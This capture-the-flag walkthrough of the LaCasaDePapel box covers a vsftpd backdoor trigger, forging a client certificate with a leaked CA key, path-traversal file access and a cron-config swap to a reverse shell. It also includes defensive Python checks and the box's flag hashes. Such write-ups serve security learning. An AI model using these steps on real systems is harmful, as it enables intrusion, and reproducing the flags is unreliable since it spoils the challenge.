- nmapAuto
- vsftp 2.3.4 exploit
- initial foothold
- dl cert
- generate client key
- certificate sign request data
- convert to PKCS12
- add key to firefox certificate store
- add ca.crt to firefox
- refresh page
- Local file Inclusion Vuln
- ssh into professor acct
- user.txt
- privesc
- user/root
- lessons learned
LaCasaDePapel
nmapAuto
nmap recon
nikto / gobuster (http and https)
no finds on the http server
vsftp 2.3.4 exploit
doing a little googling, vsftpd 2.3.4 is infamous: it has a backdoor that opens a listener on port 6200 when a username containing :) is sent
typing steve:) to trigger the backdoor
and nmap again:
port is open, lets connect
rlwrap nc to port 6200
we can use netcat to connect to our victim on port 6200. rlwrap is a wrapper that gives our shell readline history (arrow up to past commands), which is incredibly convenient in this scenario
phpinfo()
we see we're logged in as user dali
scandir
we can list the various folders of our victim by using PHP's scandir() function
interesting files
1. nairobi's ssh key
2.
ls $tokyo
if we ‘ls’ we see file_get_contents('/home/nairobi/ca.key')
and also the cert is in x509 format
using vi to clean up nairobi's key
1st, to get rid of the literal ‘\n’s: :%s/\\n//g
1. :%s/ starts a substitution on every line
2. \\n is the pattern for the literal two characters ‘\n’ (the backslash has to be escaped)
3. //g replaces each match with nothing, for every occurrence on the line
Next we need to remove the leading spaces; do that manually
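The vi cleanup above is a two-step text transform (unescape the literal `\n` sequences, then strip the indentation). The following added example, which is not from the original writeup, does the same cleanup programmatically and then sanity-checks that the result is a well-formed PEM block before you feed it to openssl. The sample input is constructed here with a placeholder base64 body; it is not a real key.

```python
import base64
import re

# Constructed sample: a PEM blob as it appears when dumped as a PHP string
# literal, i.e. with escaped "\n" sequences and leading indentation.
# The body is placeholder base64, not key material.
SAMPLE_PHP_DUMP = (
    "    -----BEGIN RSA PRIVATE KEY-----\\n"
    "    MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz\\n"
    "    QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=\\n"
    "    -----END RSA PRIVATE KEY-----\\n"
)


def php_literal_to_pem(raw: str) -> str:
    """Turn a PHP string dump of a PEM blob back into real PEM text.

    Mirrors the manual vi cleanup: the two-character sequence backslash-n
    becomes a real newline, surrounding whitespace on every line is dropped,
    and empty lines are removed.
    """
    text = raw.replace("\\n", "\n")
    lines = [line.strip() for line in text.splitlines()]
    return "\n".join(line for line in lines if line) + "\n"


_HEADER = re.compile(r"^-----BEGIN ([A-Z ]+)-----$")
_FOOTER = re.compile(r"^-----END ([A-Z ]+)-----$")


def pem_is_well_formed(pem: str) -> bool:
    """Check for matching BEGIN/END lines of the same type and a base64 body.

    This only validates the envelope; it says nothing about the key inside.
    """
    lines = pem.strip().splitlines()
    if len(lines) < 3:
        return False
    head, foot = _HEADER.match(lines[0]), _FOOTER.match(lines[-1])
    if not head or not foot or head.group(1) != foot.group(1):
        return False
    try:
        # validate=True rejects any character outside the base64 alphabet
        base64.b64decode("".join(lines[1:-1]), validate=True)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    cleaned = php_literal_to_pem(SAMPLE_PHP_DUMP)
    print(cleaned, end="")
    print("well-formed PEM:", pem_is_well_formed(cleaned))
```

Run it as a script to see the cleaned block; the same two functions can be applied to a file with `php_literal_to_pem(open(path).read())`.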
nairobi's public key
we can get nairobi's public key with a simple openssl command:
openssl pkey -in <private key> -pubout
/etc/passwd
initial foothold
dl cert
first we export the certificate to our directory, I also renamed it ca.crt
compare public keys of nairobi's key and webserver's key
we can compare the webserver's key with nairobi's key that we extracted earlier. We extract the certificate's public key with the following (the cert is in x509 form):
openssl x509 -in ca.crt -pubkey -noout
(they are the same) what does this mean?
- we have the private key to the certificate authority used to trust this webserver
- so we can generate a client key
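The comparison above is done by eye with two openssl commands. The following added example (not from the original writeup) wraps the same two commands so the check can be scripted, for instance when auditing whether a key found lying around is the one behind a CA certificate you rely on. It assumes the `openssl` binary is on PATH; the key and certificate it generates are throwaway material constructed for the demo, not the box's.

```python
import subprocess
import tempfile
from pathlib import Path
from typing import List, Tuple


def _openssl(args: List[str]) -> bytes:
    """Run one openssl subcommand and return its stdout (raises on failure)."""
    return subprocess.run(["openssl", *args], check=True, capture_output=True).stdout


def key_matches_cert(private_key: Path, cert: Path) -> bool:
    """True when the private key's public half equals the public key in the cert.

    `openssl pkey -pubout` and `openssl x509 -pubkey -noout` both print the
    SubjectPublicKeyInfo in PEM form, so a byte-for-byte comparison suffices.
    """
    from_key = _openssl(["pkey", "-in", str(private_key), "-pubout"])
    from_cert = _openssl(["x509", "-in", str(cert), "-pubkey", "-noout"])
    return from_key == from_cert


def make_demo_material(workdir: Path) -> Tuple[Path, Path, Path]:
    """Generate constructed test material: a CA key, its self-signed cert,
    and an unrelated key. Nothing here comes from the page."""
    ca_key, ca_crt, other_key = workdir / "ca.key", workdir / "ca.crt", workdir / "other.key"
    _openssl(["genrsa", "-out", str(ca_key), "2048"])
    _openssl(["req", "-x509", "-new", "-key", str(ca_key), "-subj", "/CN=demo-ca",
              "-days", "1", "-out", str(ca_crt)])
    _openssl(["genrsa", "-out", str(other_key), "2048"])
    return ca_key, ca_crt, other_key


def demo() -> Tuple[bool, bool]:
    """Returns (matching key matches?, unrelated key matches?)."""
    with tempfile.TemporaryDirectory() as d:
        ca_key, ca_crt, other_key = make_demo_material(Path(d))
        return key_matches_cert(ca_key, ca_crt), key_matches_cert(other_key, ca_crt)


if __name__ == "__main__":
    same, different = demo()
    print(f"ca.key matches ca.crt: {same}; other.key matches ca.crt: {different}")
```

For a real audit, call `key_matches_cert(Path("nairobi.key"), Path("ca.crt"))` with the files on disk; a `True` result means whoever holds that key can mint certificates the server will trust, which is exactly why a CA key must never be readable from a web application.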
generate client key
we have the private key to the certificate authority used to trust this webserver
so we can generate a client key
openssl genrsa -out client.key 4096
now we have to create a certificate signing request:
openssl req -new -key client.key -out client.csr
now we have our certificate signing request, but now we have to sign it
openssl x509 -req -in client.csr -CA ca.crt -CAkey nairobi_ca_key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer
now we have a signed certificate, but unfortunately firefox cannot import it as-is; it has to be bundled with its private key in PKCS12 format
certificate sign request data
Here are my settings, feel free to input whatever you want, it makes no difference
country:US
State:OH
Locality:SC
Org name:xiong
OU name:mao
CN:maoxiong
email:xiong@miaomao.now
pass:miao
convert to PKCS12
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
password=miao
the .p12 file bundles client.cer and client.key into one container
info
to view our certificate info:
openssl pkcs12 -info -in client.p12
add key to firefox certificate store
search for certificates in firefox's settings
add ca.crt to firefox
make sure the trust settings are set to identify websites
refresh page
we see this animation move around a bit and...
we're in the private area
https://10.10.10.131/file/U0VBU09OLTEvMDEuYXZp
Local file Inclusion Vuln
LFI: we see the path variable can load other directories on our victim as well:
https://10.10.10.131/?path=..
we've successfully navigated to another directory on the box, proving it has a local file inclusion vulnerability
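The two endpoints above (`/file/<base64 name>` and `?path=..`) show the classic mistake: a user-controlled name is joined onto a directory without checking where the final path lands. The following added example (not from the original site or writeup) shows the containment check such a handler needs: decode the token, resolve the full path, and refuse anything that escapes the base directory. The base directory it uses is a throwaway temp directory constructed for the demo; the token is the one from the private-area URL on the page.

```python
import base64
import tempfile
from pathlib import Path
from typing import Optional, Tuple


def decode_file_token(token: str) -> Optional[str]:
    """Decode the base64 file name from /file/<token>; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def resolve_inside(base: str, requested: str) -> Optional[Path]:
    """Return the absolute path for `requested` only if it stays under `base`.

    resolve() collapses '..' segments and follows symlinks, so the containment
    test runs on the final real path rather than on the raw string. An
    absolute `requested` replaces `base` when joined, which is why it is
    rejected by the same test rather than by a separate rule.
    """
    base_dir = Path(base).resolve()
    candidate = (base_dir / requested).resolve()
    try:
        candidate.relative_to(base_dir)
    except ValueError:
        return None
    return candidate


def safe_file_path(base: str, token: str) -> Optional[Path]:
    """What the /file/ handler should do: decode, then contain."""
    name = decode_file_token(token)
    if name is None:
        return None
    return resolve_inside(base, name)


def demo() -> Tuple[bool, bool, bool, bool, bool]:
    """Exercise the checks against a constructed throwaway directory."""
    with tempfile.TemporaryDirectory() as d:
        base = Path(d).resolve()
        name = decode_file_token("U0VBU09OLTEvMDEuYXZp")  # token from the page's private-area URL
        return (
            name == "SEASON-1/01.avi",
            safe_file_path(str(base), "U0VBU09OLTEvMDEuYXZp") == base / "SEASON-1" / "01.avi",
            resolve_inside(str(base), "..") is None,
            resolve_inside(str(base), "../../etc/passwd") is None,
            resolve_inside(str(base), "/etc/passwd") is None,
        )


if __name__ == "__main__":
    print("all checks behave as expected:", all(demo()))
```

The important design choice is that the check happens after `resolve()`, so `..` hidden behind symlinks or mixed with valid segments (`SEASON-1/../../etc`) is caught the same way as a bare `..`.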
.ssh
ssh into professor acct
using the rsa_id private key we downloaded, we can use trial and error to see which user owns this key and log into them via ssh
after trying each user found earlier
we have our foothold!
user.txt
privesc
pspy
memcache.ini
using professor's directory ownership to our advantage
pspy
lets monitor the processes on the box and see what we can find out
1. first set up our httpserver in the same directory as our pspy script
2. download it to our victim
3. run it and check for interesting processes
./pspy64 -f
-f -> file system events
memcache.ini
we see memcache.ini is being called every few minutes
checking the file we see it's owned by root and that we can only read the file
using professor's directory ownership to our advantage
Although we do not have permission to make changes to memcache.ini since root wrote it, professor DOES own his own /home/professor directory. That means we can simply move/rename memcache.ini within our directory, allowing us to write our own memcache.ini that will be picked up by the scheduled process we observed with pspy
finally, we replace the command variable with a reverse shell of our own
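The weakness here is not the file's permission bits but the directory's: a root-owned, read-only memcache.ini offers no protection when the scheduled job reads it from a directory the user owns, because renaming or unlinking an entry is governed by the parent directory. The following added example (not from the original writeup) is a small audit that evaluates both facts for a given uid, the kind of check a defender can run over every path a cron job or service reads. It models POSIX permission bits directly (owner, group, other, plus the sticky bit) and builds its sample directory and file in a temp location constructed for the demo.

```python
import os
import stat
import tempfile
from typing import Dict, Sequence, Tuple


def _has_bits(st: os.stat_result, uid: int, gids: Sequence[int],
              user: int, group: int, other: int) -> bool:
    """Apply whichever permission class (owner/group/other) matches uid."""
    if st.st_uid == uid:
        return (st.st_mode & user) == user
    if st.st_gid in gids:
        return (st.st_mode & group) == group
    return (st.st_mode & other) == other


def file_writable_by(path: str, uid: int, gids: Sequence[int] = ()) -> bool:
    """Can uid modify the file's contents? (what most people check)"""
    return _has_bits(os.stat(path), uid, gids, stat.S_IWUSR, stat.S_IWGRP, stat.S_IWOTH)


def entry_replaceable_by(path: str, uid: int, gids: Sequence[int] = ()) -> bool:
    """Can uid rename or unlink the directory entry, i.e. swap the file out?

    This depends on write+search permission on the *parent* directory. With
    the sticky bit set, only the directory owner or the entry's owner may
    remove or rename it.
    """
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    if not _has_bits(pst, uid, gids,
                     stat.S_IWUSR | stat.S_IXUSR,
                     stat.S_IWGRP | stat.S_IXGRP,
                     stat.S_IWOTH | stat.S_IXOTH):
        return False
    if pst.st_mode & stat.S_ISVTX and pst.st_uid != uid:
        return os.stat(path).st_uid == uid
    return True


def audit_scheduled_input(path: str, uid: int, gids: Sequence[int] = ()) -> Dict[str, bool]:
    """Summarise both risks for a file a privileged scheduled job reads."""
    return {
        "file_writable": file_writable_by(path, uid, gids),
        "entry_replaceable": entry_replaceable_by(path, uid, gids),
    }


def demo() -> Tuple[bool, bool, bool, bool, bool]:
    """Constructed scenario: a read-only config inside a directory owned by the
    current user (the memcache.ini situation), checked for the owner and for an
    unrelated uid, then again after the directory is made non-writable."""
    owner = os.getuid()
    stranger = owner + 1  # some other uid with no group membership here
    d = tempfile.mkdtemp()
    cfg = os.path.join(d, "memcache.ini")
    try:
        os.chmod(d, 0o755)
        with open(cfg, "w") as fh:
            fh.write("[demo]\nconstructed = yes\n")
        os.chmod(cfg, 0o444)  # file itself is read-only, like the page's memcache.ini
        as_owner = audit_scheduled_input(cfg, owner)
        as_stranger = audit_scheduled_input(cfg, stranger)
        os.chmod(d, 0o555)  # the mitigation: take write access to the directory away
        fixed = audit_scheduled_input(cfg, owner)
        return (
            as_owner["file_writable"],
            as_owner["entry_replaceable"],
            as_stranger["file_writable"],
            as_stranger["entry_replaceable"],
            fixed["entry_replaceable"],
        )
    finally:
        os.chmod(d, 0o755)
        os.remove(cfg)
        os.rmdir(d)


if __name__ == "__main__":
    print("owner: writable, replaceable; stranger: writable, replaceable; after fix: replaceable")
    print(demo())
```

The expected result is that the read-only file is not writable by anyone but is still replaceable by the directory owner until the directory itself is locked down, which is the fix: privileged jobs should read their configuration from a root-owned directory, never from a user's home.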
revshell
wait for the memcache.ini to run and voila!
user/root
4dcbd172fc9c9ef2ff65c13448d9062d
586979c48efbef5909a23750cc07f511